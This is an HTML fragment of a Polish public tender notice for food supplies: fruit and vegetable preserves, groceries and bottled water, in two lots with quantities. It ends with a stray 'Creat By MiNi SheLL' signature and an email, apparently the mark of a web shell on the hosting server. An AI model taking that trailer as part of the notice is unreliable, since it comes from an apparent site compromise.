              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Druk Oferta, sporządzony wg wymagań SIWZ, zgodnie z  zał. nr 1 do SIWZ  - Oferta.
2.	Prawidłowo wypełniony zał. nr 5 A  B do SIWZ  Szczegółowa oferta cenowa  zadanie nr 1 - 2 w zakresie zadań, których realizację Wykonawca oferuje.
3.	Oryginał lub kopię pełnomocnictwa:
3.1.	dla osoby/osób podpisującej/cych ofertę - do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, odpis z właściwego rejestru);
3.2.	dla ustanowionego pełnomocnika - do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy (zgodnie z art. 23 ust. 2 Ustawy, wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy);
3.3.	wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności (w przypadku złożenia kopii pełnomocnictwa musi być ona potwierdzona za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa lub poświadczona notarialnie);
3.4.	zamawiający informuje, że jeżeli w wyniku postępowania zostanie wybrana oferta wykonawców ubiegających się wspólnie o udzielenie zamówienia, będą oni zobowiązani przed zawarciem umowy przedłożyć zamawiającemu kopię umowy regulującej współpracę podmiotów występujących wspólnie (np. umowę spółki cywilnej wraz z kolejnymi aneksami lub umowę konsorcjum).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/11/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              JĘZYK POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1  dostawa przetworów owocowych i warzywnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Brokuł zamrożony	kg	250
2	Kapusta brukselska zamrożona	kg	200
3	Fasolka szparagowa  zamrożona 	kg	150
4	Różyczki kalafiora zamrożone	kg	300
5	Szpinak zamrożony 	kg	150
6	Mieszanka warzywna trzyskładnikowa zamrożona	kg	80
7	Truskawka zamrożona	kg	100
8	Czarna porzeczka zamrożona	kg	350
9	Śliwka zamrożona	kg	150
10	Frytki zamrożone 	kg	250
11	Pyzy ziemniaczane zamrożone	kg	10
12	Kluski śląskie zamrożone	kg	10
13	Kopytka zamrożone	kg	10
14	Ziemniaki sterylizowane obierane	kg	10
15	Ananas w syropie	kg**	50
16	Brzoskwinie w syropie	kg**	70
17	Chrzan tarty	kg	200
18	Buraczki konserwowe	kg**	150
19	Galaretka 	kg	35
20	Grzyby suszone	kg	20
21	Kapusta kwaszona 	kg**	800
22	Powidła śliwkowe jednoporcjowe	kg	100
23	Koncentrat pomidorowy 	kg	250
24	Kukurydza konserwowa 	kg**	250
25	Ogórki konserwowe	kg**	200
26	Ogórki kwaszone	kg**	450
27	Ogórki małosolne	kg**	200
28	Oliwki zielone konserwowe 	kg**	30
29	Sok owocowo-warzywny 0,25-0,33	l	1 000
30	Papryka konserwowa (marynowana)	kg**	350
31	Pieczarki konserwowe	kg**	250
32	Rodzynki 	kg	30
33	Sałatka warzywna 5-składnikowa	kg**	50
34	Sałatka z czerwonej kapusty	kg**	30
35	Seler konserwowy	kg**	50
36	Szczaw konserwowy	kg	50
37	Śliwki suszone 	kg	10
38	Żurawina do mięs	kg	30
39	Sok jabłkowy 1l	l	3 500
40	Sok pomarańczowy 1l	l	3 500
41	Sok pomidorowy 1l	l	1 000
42	Sok wielowocowy1l  	l	3 500
43	Nektar z czarnej porzeczki 1l	l	3 000
44	Płatki migdałowe	kg	5
45	żurawina suszona	kg	30<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15330000-0, 15320000-7,
                    15310000-4,
                    15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2  dostawa produktów ogólnospożywczych i wody<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Wafelki czekoladowe o smaku kakaowym	kg	25
2	Wafelki czekoladowe o smaku kokosowym	kg	25
3	Wafelki czekoladowe o smaku  orzechowym	kg	25
4	Wafelki czekoladowe o smaku toffi	kg	25
5	Bazylia	kg	5
6	Budyń	kg	30
7	Bulion drobiowy	kg	80
8	Rosół  wołowy	kg	30
9	Cukier waniliowy 	kg	5
10	Cukier saszetka	kg	20
11	Cynamon 	kg	2
12	Czekolada pełna mleczna	kg	130
13	Czekolada mleczna z orzechami	kg	70
14	Czosnek (mielony)	kg	2
15	Estragon	kg	1
16	Gałka muszkatołowa	kg	1
17	Herbata  czarna liściasta	kg	1
18	Herbata  w torebkach (ekspresowa)	kg	179
19	Imbir mielony	kg	1
20	Kakao	kg	1
21	Kawa naturalna mielona 	kg	180
22	Kawa rozpuszczalna 	kg	230
23	Ketchup	kg	250
24	Ketchup jednoporcjowy	kg	150
25	Kisiel 	kg	30
26	Kminek 	kg	2
27	Kwasek cytrynowy spożywczy	kg	70
28	Liść laurowy	kg	5
29	Majeranek	kg	4
30	Majonez	kg	150
31	Majonez jednoporcjowy	kg	30
32	Musztarda 	kg	200
33	Musztarda jednoporcjowa	kg	100
34	Ocet 	l	100
35	Ocet winny 	l	10
36	Oregano	kg	2
37	Paluszki	kg	100
38	Proszek do pieczenia 	kg	3
39	Przyprawa uniwersalna	kg	80
40	Przyprawa do zup w płynie	kg	200
41	Przyprawa do ryb	kg	5
42	Przyprawa do drobiu	kg	5
43	Przyprawa do mięsa	kg	5
44	Papryka chili	kg	3
45	Przyprawa curry 	kg	2
46	Rozmaryn	kg	1
47	Tymianek 	kg	1
48	Ziele angielskie	kg	5
49	Zioła prowansalskie	kg	1
50	Żelatyna spożywcza	kg	45
51	Kasza manna	kg	200
52	Mąka żytnia typ 720	kg	20
53	Mąka pszenna typ 750	kg	50
54	Mąka pszenna typ 500	kg	1 500
55	Mąka ziemniaczana	kg	50
56	Płatki kukurydziane	kg	150
57	Płatki owsiane 	kg	150
58	Fasola biała jednolita	kg	100
59	Fasola biała Jaś karłowy	kg	150
60	Groch obłuskany cały	kg	10
61	Groch obłuskany połówki	kg	100
62	Naturalna woda mineralna butelkowana gazowana 1,5 l	l	10 000
63	Naturalna woda mineralna butelkowana niegazowana 1,5 l	l	10 000
64	Naturalna woda mineralna butelkowana gazowana 0,5 l	l	2 000
65	Naturalna woda mineralna butelkowana niegazowana 0,5l	l	1 000
66	Olej  rzepakowy	l	700
67	Oliwa z oliwek	l	50
68	Olej słonecznikowy	l	200
69	drożdże świeże	kg	2
70	Musli jabłkowe	kg	80
71	Musli truskawkowe	kg	80
72	Musli morelowe	kg	80<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6, 15610000-7,
                    15410000-5,
                    15981000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com